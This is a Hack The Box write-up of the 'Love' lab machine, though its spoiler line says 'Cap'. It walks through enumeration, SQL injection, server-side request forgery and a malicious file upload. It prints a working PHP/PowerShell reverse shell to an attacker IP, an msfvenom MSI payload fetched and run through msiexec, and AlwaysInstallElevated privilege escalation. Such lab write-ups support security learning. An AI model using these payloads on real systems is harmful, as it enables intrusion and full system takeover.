HTB: Love Writeup
There are spoilers below for the Hack The Box box named Cap. Stop reading here if you do not want spoilers!!!
Enumeration
I began by the standard enumeration flow, using nmap
# Nmap 7.91 scan initiated Wed Jun 9 13:19:10 2021 as: nmap -sC -sV -oA nmap/love 10.10.10.239
Nmap scan report for 10.10.10.239
Host is up (0.26s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
...{snip}...
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
...{snip}...
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun 9 13:21:32 2021 -- 1 IP address (1 host up) scanned in 142.98 seconds
So, there are a few interesting things that may be seen. Visiting port 80 shows a voting system, port 5000 just shows an Access Denied page, and the SSL certificate from port 443 shows a different name (staging.love.htb).
Voting System (port 80)
I spent a while on this, the first thing I noticed is that the voter field is vulnerable to a timing SQL injection, using sqlmap I was able to pull the following credentials from it:
admin:$2y$10$4E3VVe2PWlTMejquTmMD6.Og9RmmFN.K5A1n99kHNdQxHePutFjsC
Unfortunately, throwing that hash into JTR and Hashcat reveals nothing, so that appears to be a deadend.
Continuing with the voting system enumeration, gobuster reveals that there are multiple directories with listings open and other additonal directories.
/admin
/includes
/images
Those both could be interesting, but lets check out the other ports
File Scanning (staging.love.htb)
Adding 10.10.10.239 staging.love.htb to my /etc/hosts file, I’m able to access this new site. It has a notification system (that doesn’t do anything) and a demo file scan. The demo file scan will download and display a file that you give it.
Forbidden (port 5000)
There’s another HTTP instance running on port 5000, but whenever visiting this page or attempting to access any subdirectories from it, I simply receive a 403 Forbidden error.
Accessing Forbidden
This part took me a long time to figure out, longer than it likely should have, but if you use the file scanner from staging.love.htb to scan 127.0.0.1:5000, it can access the page! It’ll return
Vote Admin Creds admin: @LoveIsInTheAir!!!!
Vote Login
Given the previous credentials pulled fromt he forbitten page, I was then able to access the admin page located at love.htb/admin using the credentials admin:@LoveIsInTheAir!!!!!
Getting a Shell
Now that I have admin login, it’s time to look around. I immediately notice that I can create a user and upload a photo. I wonder if there’s any validate that this is a valid photo?
Since this is a PHP website running on a Windows machine (all stuff I know from the nmap scan and the file extensions in the URL), I crafted a PHP PowerShell reverse shell payload:
<?php
exec("powershell -c \"\$client = New-Object System.Net.Sockets.TCPClient('10.10.14.204',9000);\$stream = \$client.GetStream();[byte[]]\$bytes = 0..65535|%{0};while((\$i = \$stream.Read(\$bytes, 0, \$bytes.Length)) -ne 0){;\$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$bytes,0, \$i);\$sendback = (iex \$data 2>&1 | Out-String );\$sendback2 = \$sendback + 'PS ' + (pwd).Path + '> ';\$sendbyte = ([text.encoding]::ASCII).GetBytes(\$sendback2);\$stream.Write(\$sendbyte,0,\$sendbyte.Length);\$stream.Flush();}\$client.Close()\"");
I then started a reverse shell
$ nc -lnvp 9000
And uploaded this PHP file as an image. And it worked, no validate on the type of file being uploaded at all!!
PS C:\xampp\htdocs\omrs\images> whoami
love\phoebe
Privesc
Now that I have a low level shell, it’s time to begin enumeration again to determine how to move to a system shell. After checking a few of the standard enumeration paths, I noticed the following:
PS C:\xampp\htdocs\omrs\images> reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
PS C:\xampp\htdocs\omrs\images> reg query HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Installer
AlwaysInstallElevated REG_DWORD 0x1
Because those (either one) are set to true, that means that any user is able to execute a .msi as system! So I then crafted an MSI payload:
$ msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.204 lport=1234 -f msi > rshell1234.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of msi file: 159744 bytes
$ sudo python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Back on Windows I executed the installer
> msiexec /q /i http://10.10.14.204/rshell1234.msi
And on my machine I had a metasploit listener set up
$ msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 10.10.14.204; set lport 1234; run"
[*] Using configured payload generic/shell_reverse_tcp
payload => windows/meterpreter/reverse_tcp
lhost => 10.10.14.204
lport => 1234
[*] Started reverse TCP handler on 10.10.14.204:1234
[*] Sending stage (175174 bytes) to 10.10.10.239
[*] Meterpreter session 1 opened (10.10.14.204:1234 -> 10.10.10.239:62952) at 2021-06-10 20:59:28 -0400
meterpreter > shell
Process 7128 created.
Channel 1 created.
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
nt authority\system
C:\WINDOWS\system32>
And success! We now have a system shell!!